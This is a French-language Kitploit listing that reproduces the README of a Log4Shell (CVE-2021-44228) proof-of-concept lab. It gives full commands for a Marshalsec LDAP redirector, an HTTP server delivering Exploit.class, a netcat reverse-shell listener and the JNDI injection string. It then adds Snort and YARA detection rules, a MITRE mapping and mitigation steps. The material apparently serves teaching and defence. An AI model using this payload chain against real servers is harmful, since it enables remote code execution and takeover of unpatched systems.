Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Log4Shell-PoC — **Log4Shell PoC is a high-fidelity exploitation environment designed to replicate the CVE-2021-44228 vulnerability.** It provides a containerized sandbox to demonstrate JNDI injection, LDAP/RMI referral redirection, and remote code execution (RCE) via the Log4j 2 library. | Kitploit
Outils/GitHubGitHub/josemariamicoli/log4shell-poc
Vulnerability AnalysisExploitationIDS/IPS EvasionWeb Application ExploitationCommand and ControlLearning & EducationIncident ResponsePayload DevelopmentLabs & Practice
GitHubjosemariamicoli/log4shell-poc

Log4Shell-PoC

**Log4Shell PoC is a high-fidelity exploitation environment designed to replicate the CVE-2021-44228 vulnerability.** It provides a containerized sandbox to demonstrate JNDI injection, LDAP/RMI referral redirection, and remote code execution (RCE) via the Log4j 2 library.

Voir le dépôt
il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

██╗ ██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗███████╗██╗ ██╗
██║ ██╔═══██╗██╔════╝ ██║ ██║██╔════╝██║ ██║██╔════╝██║ ██║
██║ ██║ ██║██║ ███╗███████║███████╗███████║█████╗ ██║ ██║
██║ ██║ ██║██║ ██║╚════██║╚════██║██╔══██║██╔══╝ ██║ ██║
███████╗╚██████╔╝╚██████╔╝ ██║███████║██║ ██║███████╗███████╗███████╗ ╚══════╝ ╚═════╝ ╚═════╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝╚══════╝╚══════╝

root@kitploit:~
                         ██████╗  ██████╗  ██████╗
                         ██╔══██╗██╔═══██╗██╔════╝
                         ██████╔╝██║   ██║██║     
                         ██╔═══╝ ██║   ██║██║     
                         ██║     ╚██████╔╝╚██████╔╝
                         ╚═╝      ╚═════╝  ╚═════╝ 

         ⚡ LOG4SHELL (CVE-2021-44228) LABORATOIRE PoC
          [ PREUVE DE CONCEPT & EXPLOITATION JNDI ]

Log4Shell PoC est un environnement d'exploitation haute fidélité conçu pour reproduire la vulnérabilité CVE-2021-44228. Il fournit un bac à sable conteneurisé pour démontrer l'injection JNDI, la redirection de références LDAP/RMI et l'exécution de code à distance (RCE) via la bibliothèque Log4j 2.


⚠️ AVERTISSEMENT

À des fins éducatives et de tests de sécurité autorisés uniquement.

L'utilisation de cette preuve de concept pour attaquer des cibles sans consentement mutuel préalable est illégale. Il est de la responsabilité de l'utilisateur final de se conformer à toutes les lois locales, étatiques et fédérales applicables. Les auteurs déclinent toute responsabilité et ne sont pas responsables des pertes de données, dommages système, conséquences juridiques ou mauvais usage causés par ce programme. En utilisant ce logiciel, vous acceptez de respecter les limites légales de votre juridiction.



Section 2 : Capacités et structure du projet

🚀 Capacités du PoC

  • Injection JNDI : Point d'entrée vulnérable Log4j 2.14.1.
  • Serveur de référence LDAP : Redirection LDAP malveillante via Marshalsec.
  • Chargement de classe à distance : Livraison HTTP de bytecode Java compilé.
  • Charge utile multi-étapes : Exécution de shell inverse natif Java.
  • Test d'évasion : Contournements TrustURLCodebase et FormatMsgNoLookups.

🛠 Structure du PoC

🛰 Infrastructure malveillante (Attaquant)

Le côté attaquant se compose de trois canaux distincts pour faciliter le PoC.

  • Redirecteur LDAP (Port 1389) : Basé sur Marshalsec, il dirige la requête JNDI de la victime vers l'exploit hébergé.
  • Serveur de charge utile HTTP (Port 8888) : Héberge le bytecode Exploit.class pour que la victime le télécharge et l'exécute.
  • Écouteur NC (Port 9001) : Destination de callback finale pour le shell inverse.

💻 Instance vulnérable (Victime)

Un environnement OpenJDK 8 dockerisé exécutant une implémentation Log4j vulnérable.

  • Log4j v2.14.1 : La version de bibliothèque ciblée.
  • VulnerableLog.java : Une application Java simple qui enregistre les entrées utilisateur sans assainissement.


Section 3 : Instructions d'installation et d'exécution

⚙️ Installation et exécution

1. Configuration de l'attaquant (Arch Linux)

Onglet 1 : Serveur de référence LDAP

root@kitploit:~
docker run --rm -it -p 1389:1389 maven:3.8.6-openjdk-8 /bin/bash -c "
git clone [https://github.com/mbechler/marshalsec.git](https://github.com/mbechler/marshalsec.git) && \
cd marshalsec && \
mvn clean package -DskipTests && \
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer '[http://172.17.0.1:8888/#Exploit](http://172.17.0.1:8888/#Exploit)' 1389"

Onglet 2 : Livraison de la charge utile HTTP

root@kitploit:~
# Démarrer le serveur Python dans le répertoire contenant Exploit.class
python3 -m http.server --bind 0.0.0.0 8888

Onglet 3 : Écouteur Netcat

root@kitploit:~
nc -lvnp 9001

2. Exécution de la victime

Onglet 4 : Lancer le conteneur vulnérable

root@kitploit:~
docker run --rm -it -v $(pwd):/app -w /app openjdk:8u121-jdk-alpine /bin/sh

À l'intérieur du conteneur : Déclencher le PoC

root@kitploit:~
java -Dlog4j2.formatMsgNoLookups=false \
     -Dcom.sun.jndi.ldap.object.trustURLCodebase=true \
     -cp ".:log4j-api-2.14.1.jar:log4j-core-2.14.1.jar" \
     VulnerableLog '${jndi:ldap://172.17.0.1:1389/Exploit}'



Section 4 : Détection et atténuation

🔍 Détection et surveillance défensive

1. Détection réseau (Snort/Suricata)

root@kitploit:~
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET EXPLOIT Possible Log4j RCE Attempt (jndi)"; content:"jndi|3a|"; nocase; sid:2034647; rev:1;)

2. Détection par journaux (YARA)

root@kitploit:~
rule Log4Shell_PoC_JNDI {
    meta:
        description = "Detects JNDI lookup strings in logs used in PoC"
        author = "Apex Pro Framework"
    strings:
        $jndi = / \$\{jndi:(ldap|rmi|dns|nis|iiop|corba|lds):/ i
        $obfuscated = /\$\{\$\{[^}]+\}ndi:/ i
    condition:
        any of them
}

🛡 Matrice de réponse aux incidents (IR)

PhaseTechniqueAlerte déclenchée ?MITRE ATT&CK
Accès initialExploitation d'application exposée[ ]T1190
ExécutionInterpréteur de commandes et de scripts[ ]T1059
Commande et contrôleProtocole de couche application (LDAP)[ ]T1071.003
ExfiltrationProtocole non couche application[ ]T1048

🔒 Atténuation et renforcement

  1. Mise à jour : Mettre à jour Log4j vers 2.17.1 ou supérieur.
  2. Option JVM : Définir -Dlog4j2.formatMsgNoLookups=true pour désactiver les lookups.
  3. Suppression de classe : Supprimer manuellement JndiLookup.class du JAR log4j-core.

🔒 Règles d'engagement

  1. Isolation : Coder en dur les IP cibles vers le pont Docker interne (172.17.0.0/16).
  2. Réseau : Assurer un réseau Hôte uniquement / VM interne UNIQUEMENT.
  3. Sécurité C2 : Ne pas exposer les serveurs Python ou LDAP à l'Internet public.

Télécharger l’outil